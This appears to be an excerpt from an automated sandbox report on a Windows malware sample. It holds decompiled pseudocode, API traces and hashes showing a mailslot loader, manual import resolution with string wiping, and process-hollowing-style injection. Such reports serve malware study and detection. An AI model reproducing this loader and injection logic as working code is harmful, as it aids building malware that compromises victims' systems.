						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
